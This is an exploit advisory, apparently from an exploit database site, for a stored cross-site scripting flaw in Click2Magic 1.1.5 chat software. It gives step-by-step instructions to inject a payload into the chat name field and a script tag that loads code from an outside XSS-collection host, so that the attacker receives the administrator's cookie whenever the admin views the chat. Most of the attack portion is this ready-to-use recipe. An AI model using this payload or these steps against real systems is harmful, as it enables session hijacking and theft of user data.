Click2Magic 1.1.5 Cross Site Scripting

2021.01.06
Credit: Shivam Verma
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting # Exploit Author: Shivam Verma(cyb3r_n3rd) # Date: 2020-12-25 # Google Dork: N/A # Vendor Homepage: https://www.click2magic.com/user/agent/index # Software Link: https://www.click2magic.com # Version: 1.1.5 # Category: Web Application # Tested on: Kali Linux Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Chat section each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data Step 1. visit the link Step 2. Start a new Chat Step 3. When ask for name paste your Xss Payload Step 4. Wait for the Administrator to click on Your link Step 5. You will receive Admin Cookie Everytime he Process the Request --- XSS Payload: "><script src=https://.xss.ht></script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top